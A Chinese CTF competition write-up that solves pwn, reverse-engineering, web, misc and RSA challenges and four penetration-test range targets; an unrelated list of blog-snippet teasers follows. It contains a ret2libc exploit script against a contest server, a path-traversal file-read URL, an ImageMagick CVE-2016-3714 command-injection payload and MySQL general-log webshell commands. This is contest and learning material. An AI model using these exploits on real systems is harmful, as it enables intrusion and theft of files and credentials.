郁离歌
郁离歌

巅峰极客线上第二场-writeup

CTF

PlainR2B-PWN

很明显的栈溢出,第一次溢出打印write函数的地址,然后从和libc中的地址寻找偏移,最后利用system函数和libc中的/bin/sh,getshell后运行服务器上的getflag程序随意输入一些东西,进行多轮后会输出flag

贴脚本:

from pwn import *

r = remote('117.50.60.184', 12345)

lib = ELF('./libc-2.23.so')

elf = ELF('./pwn')

writegot = elf.got["write"]

writeplt = elf.plt["write"]

func = elf.symbols["game"]

writelibc = lib.symbols["write"]

syslibc = lib.symbols["system"]

bin_addr = lib.search('/bin/sh').next()

payload = 'a' * (0x1c + 4) + p32(writeplt) + p32(func) + \

p32(1) + p32(writegot) + p32(4)

r.recvuntil("name?")

r.sendline("nana")

r.recvuntil("flag")

r.sendline(payload)

ta = r.recv()

t = r.recv()

print ta,t

writeaddr = u32(t[0:4])

sysaddr = writeaddr - writelibc + syslibc

binaddr = writeaddr - writelibc + bin_addr

payload1 = 'a' * (0x1c + 4) + p32(sysaddr) + p32(func) + p32(binaddr)

r.sendline(payload1)

r.interactive()

 

Antidbg-RE

分析程序逻辑定位关键函数,逆向程序发现是一个验证16进制的程序,提取变量进行正向解密

low4 =[0x06, 0x0C, 0x01, 0x07, 0x0B, 0x00, 0x06, 0x02, 0x01, 0x06,

0x01, 0x07, 0x02, 0x0D, 0x05, 0x01,0x03, 0x03, 0x0D, 0x04, 0x03, 0x01, 0x00, 0x0D, 0x08, 0x08,

0x01, 0x02, 0x0D, 0x07, 0x00, 0x01, 0x02, 0x06, 0x08, 0x02,0x09, 0x00, 0x05, 0x02,0x02,0x0d]

offset = [ 0x02, 0x02, 0x02, 0x02, 0x03, 0x01, 0x01, 0x02, 0x01, 0x01,

0x02, 0x01, 0x01, 0x00, 0x01, 0x01, 0x02, 0x02, 0x00, 0x01,

0x01, 0x01, 0x01, 0x00, 0x01, 0x01, 0x02, 0x02, 0x00, 0x01,

0x01, 0x02, 0x02, 0x01, 0x01, 0x01, 0x01, 0x01, 0x02, 0x01,

0x01, 0x03, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,

0x00, 0x00, 0x00, 0x00]

print len(offset),len(low4)

a = [2,3,6,7]

flag= ""

for i in range(len(low4)):

       flag += chr(a[offset[i]]<<4 | low4[i])

print flag

 

sqli-WEB

明显要注入了,随手测试注册'admin+空格'用户名,登陆拿flag。

word-MISC

公众号拿一半flag,在字体这里拿到另外一半。

rsa-CRYPTO

用python脚本提取n和e,这里可以参考我之前的文章《关于rsa的openssl命令一些随笔。》,发现n一样e不一样。明显的共模攻击。网上找个脚本改改加个base64解码跑一下拿flag。

提取脚本:

from Crypto.PublicKey import RSA

with open('./pubkey2.pem', 'r') as f:

     key = RSA.importKey(f)

     n = key.n

     e = key.e

print n

print e

 

跑明文脚本:

import gmpy2

import string

from Crypto.Util.number import long_to_bytes

from base64 import *

n = 0x8989a398988456b3fef4a6ad86df3c99577f8978048de5436befc30d8d8c94958912aa526ff333b66857306ebb8de36c2c396a84efdc5d382502daa1a3f3b6e97502d2e31c849330f5b4c95257a149a97f5954eaf89341147adcdd4e950fff74e30bbe622876b42eeac86df4ad9715d05b5604aa8179424c7d9ac46bd6b5f322b2b5728ba148704a25a8efcc1e7c84ea7e5ce3e01703f04f94a431d9954bd7ae2c7dd6e879b35f8a2d4a5efbe737257bf99bd9ee66b15aff233fc77b558a487da5952fbe2b923da9c5eb46788c050336b7e36a5ed82d5c1b2aeb0e45bee405cbe72481db2568aa829eeac87d201a5a8ff5ee6f0be38192ab2839635f6c664217L

e1 = 2333

e2 = 23333

 

with open('flag1.enc', 'r') as f:

     cipher1 = f.read()

     cipher1=b64decode(cipher1).encode('hex')

     cipher1 = string.atoi(cipher1, base=16)

with open('flag2.enc', 'r') as f:

     cipher2 = f.read()

     cipher2=b64decode(cipher2).encode('hex')

     cipher2 = string.atoi(cipher2, base=16)

# s & t

gcd, s, t = gmpy2.gcdext(e1, e2)

if s < 0:

     s = -s

     cipher1 = gmpy2.invert(cipher1, n)

if t < 0:

     t = -t

     cipher2 = gmpy2.invert(cipher2, n)

plain = gmpy2.powmod(cipher1, s, n) * gmpy2.powmod(cipher2, t, n) % n

print long_to_bytes(plain)

 

 

靶场

 

这次靶场打的蛮爽的,五个靶场通关了四个,就是时间有点不够,还是太菜了,抛砖引玉看都没看。

暗渡陈仓

虚实相接,需要出题者以声东击西的招式准备的歧路,找到正确的栈道。

1.提交上传点的地址的name(例如答:/xxxxx/)

2.提交系统管理员Hack用户的全名

3.超级管理员用户桌面根目录admin.txt文件的内容

 

打开靶场,右键查看源代码发现图片路径是u-Are-Admin 随机访问该目录,发现是一个上传绕过。用PHP可绕过,然后路径不知道,用任意读取downloadfile.php?file=读download.php发现路径是u-uploads-file,然后getshell。

蚁剑连上之后执行命令:net user查看到Hack用户名

巅峰极客线上第二场-writeup_第1张图片

然后在超级用户的桌面根目录找到admin.txt

巅峰极客线上第二场-writeup_第2张图片

瞒天过海

目的不是为了瞒天,只是做出题目的一种手段。

1.提交后台管理员密码

2.提交mysql密码

3.提交C盘根目录password.txt内容

 

主页面发现注入点,即可拿到后台登陆密码和mysql密码,somd5解一下就ok了。

进入后台之后有上传和任意读取,上传会自动加.jpg,绕了好久,结果发现有任意读取。直接读根目录password.txt

/classes/downloadfile.php?file=../../../../../../../../../../../password.txt

 

偷梁换柱

赛题是那样无情残忍,无义无理取闹,稍有踟蹰,他就偷梁换柱。

1.提交后台admin用户的密码

2.提交系统管理员ichunqiu用户的全名

3.提交/tmp/access.log的内容的前16位

一开始啥思路都没有,发现一个110.php还有hacker.jpg。后来扫波源码泄露才发现有.git泄露,githack打一发。发现数据库文件,拿到密码。登入后台。发现有上传功能,自动加.png后缀,绕不过。开始审计,发现picture.php有命令执行。

巅峰极客线上第二场-writeup_第3张图片

使用了/usr/local/bin/convert,随即想到CVE-2016–3714,找到poc看懂原理,改改就能getshell。

参考链接:https://github.com/Medicean/VulApps/blob/master/i/imagemagick/1/poc.py

巅峰极客线上第二场-writeup_第4张图片

我的payload:

push graphic-context

viewbox 0 0 640 480

fill 'url(https://example.com/1.jpg"|ls > /var/www/html/1.txt")'

pop graphic-context

即可任意命令执行。然后users拿到用户名并查看文件cat /tmp/access.log

反客为主

以静谋动,反客为主,掌握真正的大权,才能不任人摆布。

1.提交phpStudy目录下Documents.txt的内容

2.提交系统用户/ichunqiu的密码

3.提交ichunqiu用户Desktop根目录password.txt的内容

 

进去之后发现有任意读取info/include.php?filename=../../../../../../../../../../windows/win.ini

但是好像没有什么laun用,扫目录发现phpmyadmin服务,用弱口令root/root登进去,然后genernal log getshell。

参考链接:http://www.am0s.com/penetration/267.html

我的payload:

show variables like '%general%';  #查看配置

set global general_log = on;  #开启general log模式

set global general_log_file = 'C:/phpStudy/WWW/1.php';   #设置日志目录为shell地址

select '';  #写入shell

getshell之后想用mimikatz跑一发密码,结果gg了,不知道怎么回事,也不能外连msf,弹不出shell。直接读取password.txt,最后使用QuarksPwDump跑出了HASH,cmd5解密得到密码。

巅峰极客线上第二场-writeup_第5张图片

最后就是今天的经历吧。确实学到很多。也真的打的满爽的,可惜不知道能不能去决赛。

巅峰极客线上第二场-writeup_第6张图片

巅峰极客线上第二场-writeup_第7张图片

你可能感兴趣的:(CTF-WRITE-UP)

  • Linux的Initrd机制 被触发 linux
    Linux 的 initrd 技术是一个非常普遍使用的机制,linux2.6 内核的 initrd 的文件格式由原来的文件系统镜像文件转变成了 cpio 格式,变化不仅反映在文件格式上, linux 内核对这两种格式的 initrd 的处理有着截然的不同。本文首先介绍了什么是 initrd 技术,然后分别介绍了 Linux2.4 内核和 2.6 内核的 initrd 的处理流程。最后通过对 Lin
  • maven本地仓库路径修改 bitcarter maven
    默认maven本地仓库路径:C:\Users\Administrator\.m2 修改maven本地仓库路径方法:     1.打开E:\maven\apache-maven-2.2.1\conf\settings.xml     2.找到        
  • XSD和XML中的命名空间 darrenzhu xmlxsdschemanamespace命名空间
    http://www.360doc.com/content/12/0418/10/9437165_204585479.shtml http://blog.csdn.net/wanghuan203/article/details/9203621 http://blog.csdn.net/wanghuan203/article/details/9204337 http://www.cn
  • Java 求素数运算 周凡杨 java算法素数
    网络上对求素数之解数不胜数,我在此总结归纳一下,同时对一些编码,加以改进,效率有成倍热提高。 第一种:   原理: 6N(+-)1法         任何一个自然数,总可以表示成为如下的形式之一: 6N,6N+1,6N+2,6N+3,6N+4,6N+5 (N=0,1,2,…)   
  • java 单例模式 g21121 java
    想必单例模式大家都不会陌生,有如下两种方式来实现单例模式:   class Singleton { private static Singleton instance=new Singleton(); private Singleton(){} static Singleton getInstance() { return instance; }
  • Linux下Mysql源码安装 510888780 mysql
    1.假设已经有mysql-5.6.23-linux-glibc2.5-x86_64.tar.gz (1)创建mysql的安装目录及数据库存放目录       解压缩下载的源码包,目录结构,特殊指定的目录除外:           
  • 32位和64位操作系统 墙头上一根草 32位和64位操作系统
    32位和64位操作系统是指:CPU一次处理数据的能力是32位还是64位。现在市场上的CPU一般都是64位的,但是这些CPU并不是真正意义上的64 位CPU,里面依然保留了大部分32位的技术,只是进行了部分64位的改进。32位和64位的区别还涉及了内存的寻址方面,32位系统的最大寻址空间是2 的32次方= 4294967296(bit)= 4(GB)左右,而64位系统的最大寻址空间的寻址空间则达到了
  • 我的spring学习笔记10-轻量级_Spring框架 aijuans Spring 3
    一、问题提问:     → 请简单介绍一下什么是轻量级?     轻量级(Leightweight)是相对于一些重量级的容器来说的,比如Spring的核心是一个轻量级的容器,Spring的核心包在文件容量上只有不到1M大小,使用Spring核心包所需要的资源也是很少的,您甚至可以在小型设备中使用Spring。  
  • mongodb 环境搭建及简单CURD antlove WebInstallcurdNoSQLmongo
    一 搭建mongodb环境 1. 在mongo官网下载mongodb 2. 在本地创建目录 "D:\Program Files\mongodb-win32-i386-2.6.4\data\db" 3. 运行mongodb服务 [mongod.exe --dbpath "D:\Program Files\mongodb-win32-i386-2.6.4\data\
  • 数据字典和动态视图 百合不是茶 oracle数据字典动态视图系统和对象权限
    数据字典(data dictionary)是 Oracle 数据库的一个重要组成部分,这是一组用于记录数据库信息的只读(read-only)表。随着数据库的启动而启动,数据库关闭时数据字典也关闭   数据字典中包含   数据库中所有方案对象(schema object)的定义(包括表,视图,索引,簇,同义词,序列,过程,函数,包,触发器等等) 数据库为一
  • 多线程编程一般规则 bijian1013 javathread多线程java多线程
           如果两个工两个以上的线程都修改一个对象,那么把执行修改的方法定义为被同步的,如果对象更新影响到只读方法,那么只读方法也要定义成同步的。        不要滥用同步。如果在一个对象内的不同的方法访问的不是同一个数据,就不要将方法设置为synchronized的。
  • 将文件或目录拷贝到另一个Linux系统的命令scp bijian1013 linuxunixscp
    一.功能说明        scp就是security copy,用于将文件或者目录从一个Linux系统拷贝到另一个Linux系统下。scp传输数据用的是SSH协议,保证了数据传输的安全,其格式如下:        scp 远程用户名@IP地址:文件的绝对路径
  • 【持久化框架MyBatis3五】MyBatis3一对多关联查询 bit1129 Mybatis3
    以教员和课程为例介绍一对多关联关系,在这里认为一个教员可以叫多门课程,而一门课程只有1个教员教,这种关系在实际中不太常见,通过教员和课程是多对多的关系。   示例数据:   地址表:   CREATE TABLE ADDRESSES ( ADDR_ID INT(11) NOT NULL AUTO_INCREMENT, STREET VAR
  • cookie状态判断引发的查找问题 bitcarter formcgi
    先说一下我们的业务背景: 1.前台将图片和文本通过form表单提交到后台,图片我们都做了base64的编码,并且前台图片进行了压缩 2.form中action是一个cgi服务 3.后台cgi服务同时供PC,H5,APP 4.后台cgi中调用公共的cookie状态判断方法(公共的,大家都用,几年了没有问题) 问题:(折腾两天。。。。) 1.PC端cgi服务正常调用,cookie判断没
  • 通过Nginx,Tomcat访问日志(access log)记录请求耗时 ronin47
    一、Nginx通过$upstream_response_time $request_time统计请求和后台服务响应时间 nginx.conf使用配置方式: log_format main '$remote_addr - $remote_user [$time_local] "$request" ''$status $body_bytes_sent "$http_r
  • java-67- n个骰子的点数。 把n个骰子扔在地上,所有骰子朝上一面的点数之和为S。输入n,打印出S的所有可能的值出现的概率。 bylijinnan java
    public class ProbabilityOfDice { /** * Q67 n个骰子的点数 * 把n个骰子扔在地上,所有骰子朝上一面的点数之和为S。输入n,打印出S的所有可能的值出现的概率。 * 在以下求解过程中,我们把骰子看作是有序的。 * 例如当n=2时,我们认为(1,2)和(2,1)是两种不同的情况 */ private stati
  • 看别人的博客,觉得心情很好 Cb123456 博客心情
       以为写博客,就是总结,就和日记一样吧,同时也在督促自己。今天看了好长时间博客:    职业规划:    http://www.iteye.com/blogs/subjects/zhiyeguihua      android学习:    1.http://byandby.i
  • [JWFD开源工作流]尝试用原生代码引擎实现循环反馈拓扑分析 comsci 工作流
        我们已经不满足于仅仅跳跃一次,通过对引擎的升级,今天我测试了一下循环反馈模式,大概跑了200圈,引擎报一个溢出错误      在一个流程图的结束节点中嵌入一段方程,每次引擎运行到这个节点的时候,通过实时编译器GM模块,计算这个方程,计算结果与预设值进行比较,符合条件则跳跃到开始节点,继续新一轮拓扑分析,直到遇到
  • JS常用的事件及方法 cwqcwqmax9 js
    事件 描述 onactivate 当对象设置为活动元素时触发。 onafterupdate 当成功更新数据源对象中的关联对象后在数据绑定对象上触发。 onbeforeactivate 对象要被设置为当前元素前立即触发。 onbeforecut 当选中区从文档中删除之前在源对象触发。 onbeforedeactivate 在 activeElement 从当前对象变为父文档其它对象之前立即
  • 正则表达式验证日期格式 dashuaifu 正则表达式IT其它java其它
    正则表达式验证日期格式 function isDate(d){ var v = d.match(/^(\d{4})-(\d{1,2})-(\d{1,2})$/i); if(!v) { this.focus(); return false; } } <input value="2000-8-8" onblu
  • Yii CModel.rules() 方法 、validate预定义完整列表、以及说说验证 dcj3sjt126com yii
    public array rules () {return} array 要调用 validate() 时应用的有效性规则。 返回属性的有效性规则。声明验证规则,应重写此方法。 每个规则是数组具有以下结构:array('attribute list', 'validator name', 'on'=>'scenario name', ...validation
  • UITextAttributeTextColor = deprecated in iOS 7.0 dcj3sjt126com ios
    In this lesson we used the key "UITextAttributeTextColor" to change the color of the UINavigationBar appearance to white. This prompts a warning "first deprecated in iOS 7.0." Ins
  • 判断一个数是质数的几种方法 EmmaZhao Mathpython
    质数也叫素数,是只能被1和它本身整除的正整数,最小的质数是2,目前发现的最大的质数是p=2^57885161-1【注1】。 判断一个数是质数的最简单的方法如下: def isPrime1(n): for i in range(2, n): if n % i == 0: return False return True 但是在上面的方法中有一些冗余的计算,所以
  • SpringSecurity工作原理小解读 坏我一锅粥 SpringSecurity
      SecurityContextPersistenceFilter   ConcurrentSessionFilter   WebAsyncManagerIntegrationFilter   HeaderWriterFilter   CsrfFilter   LogoutFilter   Use
  • JS实现自适应宽度的Tag切换 ini JavaScripthtmlWebcsshtml5
    效果体验:http://hovertree.com/texiao/js/3.htm   该效果使用纯JavaScript代码,实现TAB页切换效果,TAB标签根据内容自适应宽度,点击TAB标签切换内容页。 HTML文件代码: <!DOCTYPE html> <html xmlns="http://www.w3.org/1999/xhtml"
  • Hbase Rest API : 数据查询 kane_xie RESThbase
    hbase(hadoop)是用java编写的,有些语言(例如python)能够对它提供良好的支持,但也有很多语言使用起来并不是那么方便,比如c#只能通过thrift访问。Rest就能很好的解决这个问题。Hbase的org.apache.hadoop.hbase.rest包提供了rest接口,它内嵌了jetty作为servlet容器。   启动命令:./bin/hbase rest s
  • JQuery实现鼠标拖动元素移动位置(源码+注释) 明子健 jqueryjs源码拖动鼠标
    欢迎讨论指正!   print.html代码: <!DOCTYPE html> <html> <head> <meta http-equiv=Content-Type content="text/html;charset=utf-8"> <title>发票打印</title> &l
  • Postgresql 连表更新字段语法 update qifeifei PostgreSQL
    下面这段sql本来目的是想更新条件下的数据,可是这段sql却更新了整个表的数据。sql如下: UPDATE tops_visa.visa_order SET op_audit_abort_pass_date = now() FROM tops_visa.visa_order as t1 INNER JOIN tops_visa.visa_visitor as t2 ON t1.
  • 将redis,memcache结合使用的方案? tcrct rediscache
    公司架构上使用了阿里云的服务,由于阿里的kvstore收费相当高,打算自建,自建后就需要自己维护,所以就有了一个想法,针对kvstore(redis)及ocs(memcache)的特点,想自己开发一个cache层,将需要用到list,set,map等redis方法的继续使用redis来完成,将整条记录放在memcache下,即findbyid,save等时就memcache,其它就对应使用redi
  • 开发中遇到的诡异的bug wudixiaotie bug
    今天我们服务器组遇到个问题: 我们的服务是从Kafka里面取出数据,然后把offset存储到ssdb中,每个topic和partition都对应ssdb中不同的key,服务启动之后,每次kafka数据更新我们这边收到消息,然后存储之后就发现ssdb的值偶尔是-2,这就奇怪了,最开始我们是在代码中打印存储的日志,发现没什么问题,后来去查看ssdb的日志,才发现里面每次set的时候都会对同一个key
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他